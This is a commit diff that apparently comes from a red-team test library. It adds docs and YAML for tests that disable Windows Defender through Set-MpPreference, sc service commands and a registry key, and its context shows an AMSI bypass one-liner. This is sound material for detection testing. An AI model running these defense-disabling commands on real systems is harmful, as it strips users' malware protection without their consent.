Generate docs from job=validate_atomics_generate_docs branch=master

2020-01-14 16:33:58 +00:00
parent 7988bb05e8
commit 70defe4dc9
4 changed files with 135 additions and 0 deletions
@@ -34,6 +34,12 @@

 - [Atomic Test #15 - PowerShell Bypass of AntiMalware Scripting Interface](#atomic-test-15---powershell-bypass-of-antimalware-scripting-interface)

+- [Atomic Test #16 - Tamper with Windows Defender ATP PowerShell](#atomic-test-16---tamper-with-windows-defender-atp-powershell)
+
+- [Atomic Test #17 - Tamper with Windows Defender Command Prompt](#atomic-test-17---tamper-with-windows-defender-command-prompt)
+
+- [Atomic Test #18 - Tamper with Windows Defender Registry](#atomic-test-18---tamper-with-windows-defender-registry)
+

 <br/>

@@ -369,4 +375,73 @@ Credit to Matt Graeber (@mattifestation) for the research.



+<br/>
+<br/>
+
+## Atomic Test #16 - Tamper with Windows Defender ATP PowerShell
+Attempting to disable scheduled scanning and other parts of windows defender atp
+
+**Supported Platforms:** Windows
+
+
+#### Run it with `powershell`!  Elevation Required (e.g. root or admin) 
+```
+Set-MpPreference -DisableRealtimeMonitoring 1
+Set-MpPreference -DisableBehaviorMonitoring 1
+Set-MpPreference -DisableScriptScanning 1
+Set-MpPreference -DisableBlockAtFirstSeen 1
+```
+
+
+#### Cleanup Commands:
+```
+Set-MpPreference -DisableRealtimeMonitoring 0
+Set-MpPreference -DisableBehaviorMonitoring 0
+Set-MpPreference -DisableScriptScanning 0
+Set-MpPreference -DisableBlockAtFirstSeen 0
+```
+
+<br/>
+<br/>
+
+## Atomic Test #17 - Tamper with Windows Defender Command Prompt
+Attempting to disable scheduled scanning and other parts of windows defender atp
+
+**Supported Platforms:** Windows
+
+
+#### Run it with `command_prompt`!  Elevation Required (e.g. root or admin) 
+```
+sc stop WinDefend
+sc config WinDefend start=disabled
+sc query WinDefend
+```
+
+
+#### Cleanup Commands:
+```
+sc start WinDefend
+sc config WinDefend start=enabled
+```
+
+<br/>
+<br/>
+
+## Atomic Test #18 - Tamper with Windows Defender Registry
+Disable Windows Defender from starting after a reboot
+
+**Supported Platforms:** Windows
+
+
+#### Run it with `powershell`!  Elevation Required (e.g. root or admin) 
+```
+Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1
+```
+
+
+#### Cleanup Commands:
+```
+Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 0
+```
+
 <br/>
@@ -218,6 +218,9 @@
  - Atomic Test #13: Disable Arbitrary Security Windows Service [windows]
  - Atomic Test #14: Disable PowerShell Script Block Logging [windows]
  - Atomic Test #15: PowerShell Bypass of AntiMalware Scripting Interface [windows]
+  - Atomic Test #16: Tamper with Windows Defender ATP PowerShell [windows]
+  - Atomic Test #17: Tamper with Windows Defender Command Prompt [windows]
+  - Atomic Test #18: Tamper with Windows Defender Registry [windows]
 - T1480 Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1211 Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1181 Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -7386,6 +7386,60 @@ defense-evasion:
        elevation_required: false
        command: '[Ref].Assembly.GetType("System.Management.Automation.AmsiUtils").GetField(''amsiInitFailed'',''NonPublic,Static'').SetValue($null,$true)

+'
+    - name: Tamper with Windows Defender ATP PowerShell
+      description: 'Attempting to disable scheduled scanning and other parts of windows
+        defender atp
+
+'
+      supported_platforms:
+      - windows
+      executor:
+        name: powershell
+        elevation_required: true
+        command: |
+          Set-MpPreference -DisableRealtimeMonitoring 1
+          Set-MpPreference -DisableBehaviorMonitoring 1
+          Set-MpPreference -DisableScriptScanning 1
+          Set-MpPreference -DisableBlockAtFirstSeen 1
+        cleanup_command: |
+          Set-MpPreference -DisableRealtimeMonitoring 0
+          Set-MpPreference -DisableBehaviorMonitoring 0
+          Set-MpPreference -DisableScriptScanning 0
+          Set-MpPreference -DisableBlockAtFirstSeen 0
+    - name: Tamper with Windows Defender Command Prompt
+      description: 'Attempting to disable scheduled scanning and other parts of windows
+        defender atp
+
+'
+      supported_platforms:
+      - windows
+      executor:
+        name: command_prompt
+        elevation_required: true
+        command: |
+          sc stop WinDefend
+          sc config WinDefend start=disabled
+          sc query WinDefend
+        cleanup_command: |
+          sc start WinDefend
+          sc config WinDefend start=enabled
+    - name: Tamper with Windows Defender Registry
+      description: 'Disable Windows Defender from starting after a reboot
+
+'
+      supported_platforms:
+      - windows
+      executor:
+        name: powershell
+        elevation_required: true
+        command: 'Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender"
+          -Name DisableAntiSpyware -Value 1
+
+'
+        cleanup_command: 'Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows
+          Defender" -Name DisableAntiSpyware -Value 0
+
 '
  T1107:
    technique:
@@ -48,6 +48,9 @@
  - Atomic Test #13: Disable Arbitrary Security Windows Service [windows]
  - Atomic Test #14: Disable PowerShell Script Block Logging [windows]
  - Atomic Test #15: PowerShell Bypass of AntiMalware Scripting Interface [windows]
+  - Atomic Test #16: Tamper with Windows Defender ATP PowerShell [windows]
+  - Atomic Test #17: Tamper with Windows Defender Command Prompt [windows]
+  - Atomic Test #18: Tamper with Windows Defender Registry [windows]
 - T1480 Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1211 Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1181 Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)